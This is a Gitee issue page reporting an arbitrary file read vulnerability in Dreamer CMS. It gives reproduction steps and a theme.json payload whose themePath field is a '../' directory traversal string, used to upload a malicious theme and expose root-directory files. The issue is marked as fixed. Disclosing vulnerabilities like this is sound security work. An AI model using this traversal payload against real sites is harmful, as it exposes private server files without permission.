204 Star 1.7K Fork 574

www.iteachyou.cc / Dreamer CMS(梦想家CMS内容管理系统)

 / 详情

Arbitrary file read vulnerability (任意文件读取

已完成
创建于  
2022-11-21 09:51

This vulnerability is present in the current version

Copy the default style file in cms, and add theme.json and recompress it into a zip file
输入图片说明

Where theme.json is as follows

{"themeName":"asdasd", "themeImage": "asdasdas", "themeAuthor":"asdasd", "themePath":"../../../../../../../../../../../../../../../"}

输入图片说明

Upload and use this theme
输入图片说明

Enter the template management to see the files in the root directory

输入图片说明

评论 (0)

Eleina-233 创建了任务
Eleina-233 修改了描述
Eleina-233 修改了标题
王俊南 任务状态待办的 修改为已完成
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
Java
1
https://gitee.com/iteachyou/dreamer_cms.git
git@gitee.com:iteachyou/dreamer_cms.git
iteachyou
dreamer_cms
Dreamer CMS(梦想家CMS内容管理系统)

搜索帮助

53164aa7 5694891 3bd8fe86 5694891